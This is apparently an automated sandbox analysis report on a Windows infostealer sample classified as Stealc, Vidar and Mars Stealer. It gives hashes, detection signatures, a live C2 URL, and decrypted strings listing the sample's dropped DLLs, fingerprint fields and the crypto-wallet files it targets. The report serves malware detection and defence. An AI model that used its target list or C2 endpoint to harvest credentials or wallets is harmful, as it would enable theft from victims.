Windows Analysis Report
m0wsoI3.exe

Overview

General Information

Sample name: m0wsoI3.exe
Analysis ID: 1640592
MD5: 599e5d1eea684ef40fc206f71b5d4643
SHA1: 5111931bba3c960d14b44871950c62249aeefff7
SHA256: 2321c97ec6ac02f588357ad3d72df237f3042054f603851587c59eaef5ceb13c
Tags: ArkeiStealer, exe, user-abuse_ch

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
PE file has a writeable .text section
PE file has nameless sections
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
Self deletion via cmd or bat file
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: m0wsoI3.exe Avira: detected
Source: http://ctrlgem.xyz/gate.php Avira URL Cloud: Label: malware
Source: ctrlgem.xyz/gate.php Avira URL Cloud: Label: malware
Source: 0.2.m0wsoI3.exe.400000.0.unpack Malware Configuration Extractor: Mars Stealer {"C2 url": "ctrlgem.xyz/gate.php"}
Source: m0wsoI3.exe Virustotal: Detection: 82%
Source: m0wsoI3.exe ReversingLabs: Detection: 83%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ExitProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ExitProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTickCount
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTickCount
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Sleep
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Sleep
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateMutexA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateMutexA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLastError
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLastError
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HAL9TH
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HAL9TH
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: JohnDoe
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: JohnDoe
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 21/04/2022 20:00:00
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 21/04/2022 20:00:00
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: http://
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: http://
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Default
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Default
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %hu/%hu/%hu %hu:%hu:%hu
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %hu/%hu/%hu %hu:%hu:%hu
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: open
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: open
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\sqlite3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\sqlite3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\freebl3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\freebl3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\mozglue.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\mozglue.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\msvcp140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\msvcp140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: nss3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: nss3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\softokn3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\softokn3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\vcruntime140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\vcruntime140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: .zip
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: .zip
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Tag:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Tag:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: IP: IP?
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: IP: IP?
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Country: Country?
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Country: Country?
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Working Path:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Working Path:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Local Time:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Local Time:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: TimeZone:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: TimeZone:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Display Language:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Display Language:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Keyboard Languages:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Keyboard Languages:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Is Laptop:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Is Laptop:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Processor:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Processor:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Installed RAM:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Installed RAM:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: OS:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: OS:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: (
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: (
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Bit)
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Bit)
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Videocard:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Videocard:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Display Resolution:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Display Resolution:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: PC name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: PC name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: User name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: User name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Domain name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Domain name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MachineID:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MachineID:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GUID:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GUID:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Installed Software:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Installed Software:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: system.txt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: system.txt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Grabber\%s.zip
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Grabber\%s.zip
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %DESKTOP%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %DESKTOP%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Ethereum
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Ethereum
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Ethereum\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Ethereum\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: keystore
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: keystore
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Electrum
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Electrum
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Electrum\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Electrum\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.*
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.*
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ElectrumLTC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ElectrumLTC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Electrum-LTC\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Electrum-LTC\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Exodus
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Exodus
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Exodus\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Exodus\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: exodus.conf.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: exodus.conf.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: window-state.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: window-state.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Exodus\exodus.wallet\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Exodus\exodus.wallet\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: passphrase.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: passphrase.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: seed.seco
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: seed.seco
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: info.seco
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: info.seco
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ElectronCash
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ElectronCash
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \ElectronCash\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \ElectronCash\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: default_wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: default_wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MultiDoge
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MultiDoge
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \MultiDoge\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \MultiDoge\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: multidoge.wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: multidoge.wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: JAXX
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: JAXX
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \jaxx\Local Storage\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \jaxx\Local Storage\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: file__0.localstorage
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: file__0.localstorage
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Atomic
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Atomic
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \atomic\Local Storage\leveldb\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \atomic\Local Storage\leveldb\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 000003.log
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 000003.log
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CURRENT
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CURRENT
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LOCK
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LOCK
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LOG
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LOG
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MANIFEST-000001
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MANIFEST-000001
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 0000*
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 0000*
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Binance
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Binance
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Binance\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Binance\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: app-store.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: app-store.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Coinomi
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Coinomi
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Coinomi\Coinomi\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Coinomi\Coinomi\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.config
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.config
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *wallet*.dat
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *wallet*.dat
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcatA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcatA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: sscanf
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: sscanf
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: memset
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: memset
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: memcpy
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: memcpy
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: wininet.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: wininet.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: user32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: user32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: netapi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: netapi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: psapi.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: psapi.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: vaultcli.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: vaultcli.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: shell32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: shell32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ole32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ole32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: dbghelp.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: dbghelp.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: WriteFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: WriteFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CloseHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CloseHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrlenA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrlenA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ReadFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ReadFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: OpenProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: OpenProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetEndOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetEndOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LocalFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LocalFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTempPathA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTempPathA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindClose
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindClose
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CopyFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CopyFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DeleteFileA
